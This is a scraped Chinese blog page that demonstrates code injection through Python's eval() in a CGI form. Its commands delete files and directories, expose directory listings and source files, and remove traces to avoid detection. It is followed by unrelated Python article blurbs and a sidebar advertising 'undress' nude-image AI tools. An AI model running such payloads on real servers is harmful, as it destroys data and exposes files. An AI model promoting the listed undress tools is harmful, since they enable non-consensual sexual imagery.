一般来说Python的eval()函数可以把字符串“123”变成数字类型的123,但是PP3E上说它很危险,还可以执行其他命令!
对此进行一些试验。果然,如果python写的cgi程序中如果使用eval()而非int()来转换诸如年龄这样的输入框中的内容时是非常危险的。不仅可以看见列出系统的全部文件,还可以执行删除文件,察看文件源代码等危险操作!
试着写了个程序,想把本地的脚本文件同过这样的形式一行一行的写到服务器的某个文件里,可最后失败在无法输入换行符"/n",在提交的语句里只要有换行符,就会出现EOL的出错提示,换了编码方式还是没能成功。
网页里有一个提交名字的窗口,这里只是以改它为例,否则名字是不会用eval函数转换的,不过年龄到是很容易出问题。这个文件(http://localhost/tutor4.html)导入了os。
line1 = "Hello, %s." % eval(form['user'].value)
(1)
os.system('del * /q') #删除当前目录下所有文件(不包括文件夹)。
os.system调用当前系统的命令(如windows)
/q
指定强制状态。不提示您确认删除。
(2)若删除文件夹,使用rmdir
/s
删除指定目录和所有子目录以及包含的所有文件。使用 /s 来删除目录树。
/q
在安静模式中运行 rmdir。不经确认即删除目录。
os.system('rmdir d:/workspace /s/q')
(3)列出所有文件os.system('dir')。因为成功执行了dir命令后,系统返回0,所以看到的返回内容只能是Hello,0.而在服务器上,倒是真的列出来了,如果有日志,可能被发现。提交os.system('dir >dir.txt'),那么访问http://localhost/dir.txt那么所有的文件和文件夹都暴露了,想看源代码吗?如果再使用os.system('type target.py').命令如果成功完成同样会返回Hello, 0.的。难道再放进一个文件,再访问那个文件吗?open('target.py').read()
由此,可以在列出和察看其他文件夹里面的内容了。
如果没干别的坏事,那么可删除dir.txt以免被人发现了。os.system('del dir.txt /q')
导入os并执行命令:
__import__('os').system('dir >dir.txt')
Python: Automation, Scripting, and Task ManagementApr 16, 2025 am 12:14 AMPython excels in automation, scripting, and task management. 1) Automation: File backup is realized through standard libraries such as os and shutil. 2) Script writing: Use the psutil library to monitor system resources. 3) Task management: Use the schedule library to schedule tasks. Python's ease of use and rich library support makes it the preferred tool in these areas.
Python and Time: Making the Most of Your Study TimeApr 14, 2025 am 12:02 AMTo maximize the efficiency of learning Python in a limited time, you can use Python's datetime, time, and schedule modules. 1. The datetime module is used to record and plan learning time. 2. The time module helps to set study and rest time. 3. The schedule module automatically arranges weekly learning tasks.
Python: Games, GUIs, and MoreApr 13, 2025 am 12:14 AMPython excels in gaming and GUI development. 1) Game development uses Pygame, providing drawing, audio and other functions, which are suitable for creating 2D games. 2) GUI development can choose Tkinter or PyQt. Tkinter is simple and easy to use, PyQt has rich functions and is suitable for professional development.
Python vs. C : Applications and Use Cases ComparedApr 12, 2025 am 12:01 AMPython is suitable for data science, web development and automation tasks, while C is suitable for system programming, game development and embedded systems. Python is known for its simplicity and powerful ecosystem, while C is known for its high performance and underlying control capabilities.
The 2-Hour Python Plan: A Realistic ApproachApr 11, 2025 am 12:04 AMYou can learn basic programming concepts and skills of Python within 2 hours. 1. Learn variables and data types, 2. Master control flow (conditional statements and loops), 3. Understand the definition and use of functions, 4. Quickly get started with Python programming through simple examples and code snippets.
Python: Exploring Its Primary ApplicationsApr 10, 2025 am 09:41 AMPython is widely used in the fields of web development, data science, machine learning, automation and scripting. 1) In web development, Django and Flask frameworks simplify the development process. 2) In the fields of data science and machine learning, NumPy, Pandas, Scikit-learn and TensorFlow libraries provide strong support. 3) In terms of automation and scripting, Python is suitable for tasks such as automated testing and system management.
How Much Python Can You Learn in 2 Hours?Apr 09, 2025 pm 04:33 PMYou can learn the basics of Python within two hours. 1. Learn variables and data types, 2. Master control structures such as if statements and loops, 3. Understand the definition and use of functions. These will help you start writing simple Python programs.
How to teach computer novice programming basics in project and problem-driven methods within 10 hours?Apr 02, 2025 am 07:18 AMHow to teach computer novice programming basics within 10 hours? If you only have 10 hours to teach computer novice some programming knowledge, what would you choose to teach...
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
DVWA
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is very vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the process of securing web applications, and to help teachers/students teach/learn in a classroom environment Web application security. The goal of DVWA is to practice some of the most common web vulnerabilities through a simple and straightforward interface, with varying degrees of difficulty. Please note that this software
Notepad++7.3.1
Easy-to-use and free code editor
Safe Exam Browser
Safe Exam Browser is a secure browser environment for taking online exams securely. This software turns any computer into a secure workstation. It controls access to any utility and prevents students from using unauthorized resources.
mPDF
mPDF is a PHP library that can generate PDF files from UTF-8 encoded HTML. The original author, Ian Back, wrote mPDF to output PDF files "on the fly" from his website and handle different languages. It is slower than original scripts like HTML2FPDF and produces larger files when using Unicode fonts, but supports CSS styles etc. and has a lot of enhancements. Supports almost all languages, including RTL (Arabic and Hebrew) and CJK (Chinese, Japanese and Korean). Supports nested block-level elements (such as P, DIV),
MantisBT
Mantis is an easy-to-deploy web-based defect tracking tool designed to aid in product defect tracking. It requires PHP, MySQL and a web server. Check out our demo and hosting services.
